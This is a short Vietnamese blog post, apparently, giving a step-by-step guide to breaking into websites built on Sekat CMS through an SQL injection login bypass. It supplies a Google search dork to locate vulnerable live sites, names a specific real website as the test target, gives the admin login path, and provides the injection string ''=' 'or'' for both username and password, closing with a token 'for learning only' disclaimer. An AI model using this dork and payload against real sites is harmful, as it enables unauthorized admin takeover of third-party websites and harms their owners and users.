Hướng dẫn khai thác lỗ hổng của Sekat CMS

Sekat CMS hiện đang bị lỗ hổng SQL Injection, chỉ với một vài thủ thuật nhỏ, bạn có thể truy cập vào quyền quản trị Admin của Website, mà không cần phải tốn nhiều thời gian để khai thác.

Mình đi thẳng vào vấn đề luôn nhé

Bước 1: Tìm các Website sử dụng Sket CMS bằng Google

Nhập lệnh tìm kiếm dưới đây vào Google Search

intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com

 

Bước 2: Chọn bất kỳ 1 Website được liệt kê trong Google

Mình sẽ chọn trang: http://unstccs.com để Test

Bước 3: Truy cập vào Weblogin Admin bằng Link dưới

http://tênwebiste.com/member_login.php

Cụ thể sẽ là:

Bước 4: Khai thác lỗi đăng nhập bằng điền UserPass như bên dưới:

Username: '=' 'or'
Password: '=' 'or'

Bước 5: Truy cập được vào quyền Admin, việc tiếp theo là của các bạn

Chỉ nên dùng để học tập, đừng phá người khác nhé

Đánh giá post
Exit mobile version